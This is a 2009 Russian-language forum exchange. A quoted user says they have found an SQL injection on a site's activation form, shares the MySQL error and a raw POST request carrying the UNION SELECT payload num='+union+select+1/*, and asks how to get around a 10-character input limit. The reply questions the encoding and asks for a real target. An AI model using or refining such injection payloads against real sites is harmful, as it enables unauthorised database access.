31.08.2009, 08:21
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от p.r0phe.t
подскажите,пожалуйста,нашё л sql-injection,при попытке подбора полей выдаёт ошибку
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'u' AND num_begin < 'nion selec' AND num_end > 'nion selec'' at line 1
Видимо поле для ввода информации ограничено 10-тью символами. Как обойти?
запрос делаю такой:
Код:
POST http://www.host.ru/activation HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-excel, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://www.host.ru/
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.host.ru
Content-Length: 14
Proxy-Connection: Keep-Alive
Pragma: no-cache
num='+union+select+1/*
хмм ну во-первых, если POST то какие плюсы? Во-вторых дай реальный пример, не охото в небо пальцем тыкать...
|
|
|